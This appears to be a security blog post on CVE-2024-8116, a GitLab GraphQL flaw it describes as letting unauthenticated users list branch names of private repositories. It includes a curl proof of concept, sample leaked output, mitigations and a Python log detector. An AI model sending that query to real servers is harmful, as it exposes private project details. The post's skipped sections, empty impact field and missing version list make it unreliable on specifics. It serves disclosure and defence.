A new security issue, CVE-2024-8116, was discovered in multiple versions of GitLab Community Edition (CE) and Enterprise Edition (EE). This vulnerability lets unauthorized users use a specially crafted GraphQL query to uncover branch names in private repositories—a serious information leak that may help with further attacks.

Let’s break down how this issue works, including a code example, and show how to mitigate it.

2. What is CVE-2024-8116?

CVE-2024-8116 is an information disclosure bug in GitLab’s GraphQL API.
An unauthenticated user can extract private branch names by sending specially crafted queries to the server.

Why does this matter?
Branch names can contain hints about upcoming features, security work, internal processes, or even code that attackers can later try to access. Knowing just the branch names can help attackers plan more targeted attacks.

GitLab’s advisory lists the following affected versions:

- GitLab CE/EE

How does it happen?

Normally, branch names for a private project are kept confidential and only authorized users can see them.
A specific GraphQL query, however, could bypass this restriction under certain (undisclosed) conditions. In essence, the bug let unauthenticated users enumerate branch names by abusing the API design.

Impact:

5. Proof of Concept (PoC)

Below is a simple code example of how an attacker could leverage the flaw.
> Note: _Never run exploits on systems you don’t own! This is for educational and defensive purposes._

The “branchNames” field of the repository object is what gets exposed:

query getBranches($fullPath: ID!) {
  project(fullPath: $fullPath) {
    repository {
      branchNames
    }
  }
}

Here’s an example using curl (no authentication needed):

curl -X POST https://gitlab.example.com/api/graphql \
  -H "Content-Type: application/json" \
  --data '{"query":"query getBranches($fullPath: ID!) { project(fullPath: $fullPath) { repository { branchNames } } }","variables":{"fullPath":"private-group/private-repo"}}'

If the repository private-group/private-repo exists and your GitLab is vulnerable, you’ll get:

{
  "data": {
    "project": {
      "repository": {
        "branchNames": [
          "feature/big-redesign",
          "security/fix-auth",
          "develop",
          "main"
        ]
      }
    }
  }
}

> Tip: Even though you’re not logged in, you see internal branch names.

6. Fixes & Mitigations

The fix: GitLab 17.6.2

You should update immediately if running an older version.

Workaround:

- Restrict public and unauthenticated API access at the network or web server level.
- Regularly monitor API access logs for unexpected requests to /api/graphql.
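A small detector for the monitoring step above, added here as an example and not code from GitLab or the original post. It assumes JSON-lines log entries carrying path, username, query_string, variables and remote_ip fields (a constructed layout, loosely modelled on GitLab’s graphql_json.log; check it against your own log schema before relying on it).

```python
import json
from collections import Counter

# Constructed sample log lines (not real GitLab output): two unauthenticated
# branch enumerations from one address, one authenticated query, one unrelated request.
SAMPLE_LOG = """
{"path":"/api/graphql","remote_ip":"203.0.113.7","username":null,"query_string":"query getBranches($fullPath: ID!) { project(fullPath: $fullPath) { repository { branchNames } } }","variables":"{\\"fullPath\\":\\"private-group/private-repo\\"}"}
{"path":"/api/graphql","remote_ip":"203.0.113.7","username":null,"query_string":"query getBranches($fullPath: ID!) { project(fullPath: $fullPath) { repository { branchNames } } }","variables":"{\\"fullPath\\":\\"private-group/other-repo\\"}"}
{"path":"/api/graphql","remote_ip":"198.51.100.4","username":"alice","query_string":"query { project(fullPath: \\"public-group/app\\") { repository { branchNames } } }","variables":"{}"}
{"path":"/api/v4/projects","remote_ip":"203.0.113.7","username":null,"query_string":"","variables":""}
""".strip()

SENSITIVE_FIELDS = ("branchNames",)  # extend with other fields you consider private

def find_unauth_branch_enumeration(log_text: str) -> list[dict]:
    """Return entries where an unauthenticated caller asked /api/graphql
    for a sensitive repository field (here: branchNames)."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than abort the scan
        if entry.get("path") != "/api/graphql":
            continue
        if entry.get("username"):  # authenticated requests are not this bug
            continue
        query = entry.get("query_string") or ""
        if not any(field in query for field in SENSITIVE_FIELDS):
            continue
        try:  # variables arrive as a JSON-encoded string in this (assumed) layout
            variables = json.loads(entry.get("variables") or "{}")
        except json.JSONDecodeError:
            variables = {}
        hits.append({"remote_ip": entry.get("remote_ip"),
                     "project": variables.get("fullPath")})
    return hits

def sources_by_count(hits: list[dict]) -> Counter:
    """Count flagged requests per source address to spot enumeration runs."""
    return Counter(h["remote_ip"] for h in hits)

if __name__ == "__main__":
    found = find_unauth_branch_enumeration(SAMPLE_LOG)
    for ip, n in sources_by_count(found).most_common():
        print(f"{ip}: {n} unauthenticated branchNames request(s)")
```

Feed it real log lines only after adjusting the field names, and treat a single address hitting many distinct fullPath values as the signal worth alerting on.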

7. References

- GitLab Security Release Blog
- GitLab CVE-2024-8116 advisory
- GitLab Issue Tracker
- Official Patch Notes

Final Thoughts

While this bug doesn’t give attackers access to your code, information leaks like branch names can be damaging, providing attackers with clues, targets, and future attack plans.
Update your GitLab installations today and keep a close eye on API activity. Remember: Security starts before access control fails—don’t give away clues.

Timeline

Published on: 12/16/2024 05:15:05 UTC